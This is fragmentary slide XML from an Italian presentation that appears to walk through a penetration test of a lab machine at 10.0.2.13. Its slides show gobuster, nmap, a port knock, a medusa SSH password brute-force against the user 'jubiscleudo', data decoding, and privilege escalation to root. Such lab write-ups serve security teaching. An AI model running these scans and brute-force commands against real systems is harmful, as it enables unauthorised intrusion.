            <a:ext cx="450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ENUMERATING TARGET e PORT SCANNING</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="492" name="Google Shape;492;p32"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle" idx="6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2464200" y="4049440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>
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>CONCLUSIONI</a:t>
            </a:r>
            <a:endParaRPr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Google Shape;488;p32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{12226357-2B9B-29CF-A180-BC3AE6D71DAE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2464200" y="2064369"/>
            <a:ext cx="421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400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>VULNERABILITY MAPPING</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Google Shape;485;p32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58EC78A8-5F34-9641-54C6-8DE756DE19EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2464200" y="2615580"/>
            <a:ext cx="421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400" dirty="0"/>
              <a:t>TARGET EXPLOITATION</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Google Shape;488;p32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{536ABF7E-1661-FE66-8354-7AEF709A37AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2464200" y="3097942"/>
            <a:ext cx="421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400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>PRIVILEGE ESCALATION</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Google Shape;485;p32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89F5E84C-6368-0415-DA6E-72E959D04151}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2534789" y="3584470"/>
            <a:ext cx="421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3000" b="0" i="0" u="none" strike="noStrike" cap="none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400" dirty="0"/>
              <a:t>MANTAINING ACCESS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/>
      <p:bldP spid="488" grpId="0"/>
      <p:bldP spid="490" grpId="0"/>
      <p:bldP spid="492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gobuster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75892" y="2079142"/>
              <a:ext cx="2089815" cy="118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gobuster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dir –u 10.0.2.13 –w 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usr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/share/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wordlists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dirb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/common.txt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62FCB5D2-8E0B-7B8B-B7E7-2DB045AAE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" r="2212"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4213860" y="1175554"/>
            <a:ext cx="447294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6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gobuster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75892" y="2079142"/>
              <a:ext cx="2089815" cy="118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gobuster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dir –u 10.0.2.13 –w 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usr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/share/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wordlists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dirb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/common.txt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907FD809-64DB-D0F3-E822-BF8C56C5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5887"/>
            <a:ext cx="361981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5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OWASP ZAP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36626" y="1710464"/>
              <a:ext cx="2085694" cy="1505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Scansione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automatica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: attack mode</a:t>
              </a:r>
              <a:endParaRPr lang="it-IT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2" name="Immagine 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C325740-9A0D-14A9-3C2C-42D299991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74"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4161431" y="1710464"/>
            <a:ext cx="4449540" cy="17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Vulnerability mapping </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>automatico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Nessus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275892" y="2079142"/>
              <a:ext cx="2168348" cy="1505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Web test scan</a:t>
              </a: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Discovery scan type: </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" i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common ports </a:t>
              </a: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Assessment scan type: </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" i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Scan for all web vulnerabilities (quick)</a:t>
              </a:r>
              <a:endParaRPr lang="it-IT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8BAC3457-511E-EB05-8A24-C190DBDB0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"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4197350" y="1108133"/>
            <a:ext cx="4478059" cy="881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9792B9-183F-5AD2-E728-1E9ECEC0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92" y="2076872"/>
            <a:ext cx="3851950" cy="22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2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5275" y="2797620"/>
            <a:ext cx="3863100" cy="74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Exploitation</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en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5A7A54-9304-202B-F90A-982BB5889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24" b="18105"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="725275" y="3017166"/>
            <a:ext cx="6765650" cy="628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1017;p53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{52D45346-C1D1-7E19-1CE5-4960DBEA9C8E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4108100" y="3434078"/>
            <a:ext cx="2085694" cy="150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1.txt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2.txt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3.jpg</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" i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64BEB6D-6B8F-2F30-9354-F5A05F47F0EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3672840" y="3177540"/>
            <a:ext cx="1926431" cy="15395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"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="555300" y="1611340"/>
            <a:ext cx="80334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6118958" y="1696529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3.jpg</a:t>
            </a:r>
            <a:endParaRPr dirty="0"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3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="771658" y="1696529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1.txt</a:t>
            </a:r>
            <a:endParaRPr dirty="0"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4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6118958" y="3255715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S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>teganografia </a:t>
            </a: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65535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3" name="Google Shape;613;p37"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3445308" y="2583756"/>
            <a:ext cx="2255100" cy="1343918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++++++++++[&gt;+&gt;+++&gt;+++++++&gt;++++++++++&lt;&lt;&lt;&lt;-]&gt;&gt;&gt;------------------....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brainfuck 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4444</a:t>
            </a:r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6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="771658" y="2511802"/>
            <a:ext cx="2253385" cy="1343918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MTAwMDA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=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base64 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10000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Exploitation, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>decodifica dati</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="616" name="Google Shape;616;p37"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3445308" y="1696529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2.txt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89AC8A8-171E-3DAC-BF79-507BDC30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33" t="41199" r="1631" b="2325"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6561109" y="2320507"/>
            <a:ext cx="1370797" cy="863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9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build="p"/>
      <p:bldP spid="611" grpId="0"/>
      <p:bldP spid="612" grpId="0"/>
      <p:bldP spid="613" grpId="0"/>
      <p:bldP spid="614" grpId="0"/>
      <p:bldP spid="6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Exploitation, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>port knocking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1574100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Port knocking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knock 10.0.2.13 10000 4444 65535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52287EE8-0DEB-B362-DE6E-C9C9BE730A2A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4130039" y="1204213"/>
            <a:ext cx="4549141" cy="3440186"/>
            <a:chOff x="4130039" y="1204213"/>
            <a:chExt cx="4549141" cy="3440186"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="3" name="Immagine 2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423826EB-665A-C6A8-57C2-0B3190F99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9" r="1871" b="34425"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="4130039" y="1204213"/>
              <a:ext cx="4549141" cy="2814893"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="Google Shape;504;p34">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8782BE89-2486-F67F-02F8-8D9FD381CD81}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4533640" y="4151480"/>
              <a:ext cx="3741938" cy="49291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Aft>
                  <a:spcPts val="1600"/>
                </a:spcAft>
              </a:pP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nmap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-A -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oX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knock_scan.xml 10.0.2.13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02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Exploitation, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>password cracking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1574100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m</a:t>
                </a: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edusa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medusa –h 10.0.2.13 –u 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jubiscleudo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–P all_wordlists.txt –w s –M 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ssh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C5BC55D8-7DCE-73CB-FCB3-E3A7F38FB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2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3990130" y="1663722"/>
            <a:ext cx="4752992" cy="64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55B32D2-3E5D-3E38-CFE4-826610B01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276" y="2831381"/>
            <a:ext cx="4584700" cy="1186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Exploitation, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>accesso alla macchina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7D8F384-0E9B-016A-01C8-0211CF3FA774}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4701542" y="1874520"/>
            <a:ext cx="3822740" cy="2068839"/>
            <a:chOff x="4701542" y="1874520"/>
            <a:chExt cx="3822740" cy="2068839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DEF0CF4-DB97-33FD-DEFF-ECAF68634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07" r="26688" b="7705"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4701542" y="1874520"/>
              <a:ext cx="3822740" cy="1516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504;p34">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{20AD2786-D4A1-D04F-B997-B792D02E2165}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4701542" y="3450440"/>
              <a:ext cx="3822740" cy="49291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Aft>
                  <a:spcPts val="1600"/>
                </a:spcAft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/scripts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6DDDCA9-27A5-3B9A-7012-5038B159676F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="495934" y="1087874"/>
            <a:ext cx="3946526" cy="3830845"/>
            <a:chOff x="495934" y="1087874"/>
            <a:chExt cx="3946526" cy="3830845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14C9893-8F45-392C-8174-AAFDE2FE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935" y="1087874"/>
              <a:ext cx="3946525" cy="3226831"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="Google Shape;504;p34">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C06AD36-B299-EA32-0326-7DB9397639A9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="495934" y="4425800"/>
              <a:ext cx="3946525" cy="49291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Aft>
                  <a:spcPts val="1600"/>
                </a:spcAft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/home/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jubiscleudo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/user.txt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14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5275" y="1668780"/>
            <a:ext cx="3863100" cy="187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Privilege</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ESCALATION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" name="Google Shape;711;p44">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D7F5EDEC-D094-FE40-8CD3-24F6D0501263}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4819444" y="1509048"/>
            <a:ext cx="1911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Barlow"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>jubiscleudo</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Google Shape;712;p44">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A4923E0F-19CA-F9F1-5503-D49FB16008A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6249177" y="2880971"/>
            <a:ext cx="1911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Barlow"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>hackable_3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Google Shape;713;p44">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D7BF2E57-23B3-4CC9-F037-AF5C8ECF0AB3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4866669" y="4515679"/>
            <a:ext cx="1911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Barlow"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>root</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Google Shape;714;p44">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{86F8EF14-83F2-5413-A2F7-A854A13B7EF3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5433394" y="988949"/>
            <a:ext cx="6834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 dirty="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" name="Google Shape;715;p44">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA9D4DED-88E6-D77F-1767-3FEEDB40CFDA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6848402" y="2357771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 dirty="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" name="Google Shape;716;p44">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B8B80B92-1A0B-4965-7A77-3C1C881FF2A7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5498983" y="399558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 dirty="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9" name="Google Shape;717;p44">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C4BEEF1A-B14E-9871-C363-8B6D39D3EDCA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="5400000">
            <a:off x="4698068" y="2503918"/>
            <a:ext cx="3841361" cy="739143"/>
            <a:chOff x="2386006" y="1878266"/>
            <a:chExt cx="4322457" cy="915254"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20" name="Google Shape;718;p44">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82FB6215-A45F-EBD0-54D9-F38B4AE2B680}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2386006" y="1878266"/>
              <a:ext cx="167813" cy="162554"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1405" h="1361" extrusionOk="0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9;p44">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9BE82F2-2626-FAED-B5A9-47FB0C8BE6FA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4454925" y="2630966"/>
              <a:ext cx="167813" cy="162554"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1405" h="1361" extrusionOk="0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0;p44">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{52A09625-2F33-6AF7-FFF2-EF5D0F766162}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6540650" y="1878266"/>
              <a:ext cx="167813" cy="162554"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1405" h="1361" extrusionOk="0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721;p44">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8286DB0A-430D-9A55-2EAF-A7A305847823}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2471850" y="1957950"/>
              <a:ext cx="2079600" cy="754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722;p44">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B0AA9239-F932-54F0-0F4F-904A99CD66AF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="4544150" y="1965350"/>
              <a:ext cx="2094300" cy="747600"/>
            </a:xfrm>
            <a:prstGeom prst="bentConnector3">
              <a:avLst>
                <a:gd name="adj1" fmla="val 48908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6647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"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="558775" y="1939000"/>
            <a:ext cx="80334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5324214" y="238775"/>
            <a:ext cx="39" cy="195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6118957" y="1936187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/>
              <a:t>Contesto</a:t>
            </a:r>
            <a:endParaRPr sz="2600" dirty="0"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3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="769943" y="1939000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/>
              <a:t>Attaccante</a:t>
            </a:r>
            <a:endParaRPr sz="2600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="615" name="Google Shape;615;p37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Introduzione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16" name="Google Shape;616;p37"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3444450" y="1936187"/>
            <a:ext cx="2255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/>
              <a:t>Target</a:t>
            </a:r>
            <a:endParaRPr sz="2600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Immagine 7" descr="Are There Any OS or Distro Alternatives to Kali-Linux? - Cyber Security ...">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C79C71A0-3777-23C4-5E20-FF40760A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93" y="2711987"/>
            <a:ext cx="1524000" cy="144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2;p15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C62168E-E126-4AD9-06EE-A80A5564C3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761" y="2711987"/>
            <a:ext cx="1974860" cy="124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FC305C-D337-6178-290F-261C8A6DC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930" l="8804" r="90000">
                        <a14:foregroundMark x1="31848" y1="23256" x2="31848" y2="23256"/>
                        <a14:foregroundMark x1="29022" y1="20930" x2="29022" y2="20930"/>
                        <a14:foregroundMark x1="27717" y1="20155" x2="27717" y2="20155"/>
                        <a14:foregroundMark x1="26630" y1="19380" x2="26630" y2="19380"/>
                        <a14:foregroundMark x1="25652" y1="19380" x2="25652" y2="19380"/>
                        <a14:foregroundMark x1="25217" y1="19380" x2="27283" y2="58333"/>
                        <a14:foregroundMark x1="25978" y1="18992" x2="45543" y2="3101"/>
                        <a14:foregroundMark x1="45543" y1="3101" x2="64783" y2="18023"/>
                        <a14:foregroundMark x1="42609" y1="17054" x2="42609" y2="17054"/>
                        <a14:foregroundMark x1="40435" y1="13372" x2="46739" y2="32752"/>
                        <a14:foregroundMark x1="44348" y1="10078" x2="53261" y2="23256"/>
                        <a14:foregroundMark x1="46630" y1="9690" x2="54674" y2="14147"/>
                        <a14:foregroundMark x1="33913" y1="17442" x2="38804" y2="18992"/>
                        <a14:foregroundMark x1="53261" y1="53295" x2="53261" y2="53295"/>
                        <a14:foregroundMark x1="59457" y1="45736" x2="59457" y2="45736"/>
                        <a14:foregroundMark x1="25000" y1="18411" x2="25000" y2="18411"/>
                        <a14:foregroundMark x1="24891" y1="21899" x2="24891" y2="21899"/>
                        <a14:foregroundMark x1="24783" y1="22287" x2="26087" y2="59884"/>
                        <a14:foregroundMark x1="67174" y1="18411" x2="67174" y2="18411"/>
                        <a14:foregroundMark x1="67065" y1="21899" x2="67065" y2="21899"/>
                        <a14:foregroundMark x1="66957" y1="19380" x2="66957" y2="19380"/>
                        <a14:backgroundMark x1="24674" y1="51357" x2="24674" y2="51357"/>
                        <a14:backgroundMark x1="24783" y1="48450" x2="24783" y2="48450"/>
                        <a14:backgroundMark x1="24783" y1="45930" x2="24783" y2="45930"/>
                        <a14:backgroundMark x1="24783" y1="43023" x2="24783" y2="43023"/>
                        <a14:backgroundMark x1="24674" y1="39535" x2="24674" y2="39535"/>
                        <a14:backgroundMark x1="40870" y1="1744" x2="40870" y2="1744"/>
                        <a14:backgroundMark x1="43370" y1="1744" x2="43370" y2="1744"/>
                        <a14:backgroundMark x1="44783" y1="969" x2="44783" y2="969"/>
                        <a14:backgroundMark x1="46739" y1="581" x2="46739" y2="581"/>
                        <a14:backgroundMark x1="47609" y1="775" x2="47609" y2="775"/>
                        <a14:backgroundMark x1="49130" y1="2132" x2="49457" y2="2326"/>
                        <a14:backgroundMark x1="62717" y1="74031" x2="62500" y2="73450"/>
                        <a14:backgroundMark x1="59891" y1="70155" x2="59891" y2="70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9" y="2628387"/>
            <a:ext cx="2522848" cy="14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build="p"/>
      <p:bldP spid="611" grpId="0" build="p"/>
      <p:bldP spid="6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Privilege escalation, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hackable_3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8059D8-62AE-9998-F4CD-3E1C4AAA6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b="49579"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2206625" y="1223807"/>
            <a:ext cx="4730750" cy="1203961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E2C0ACBF-F2F0-EFD9-B7C6-DF8AE4304214}"/>
              </a:ext>
            </a:extLst>
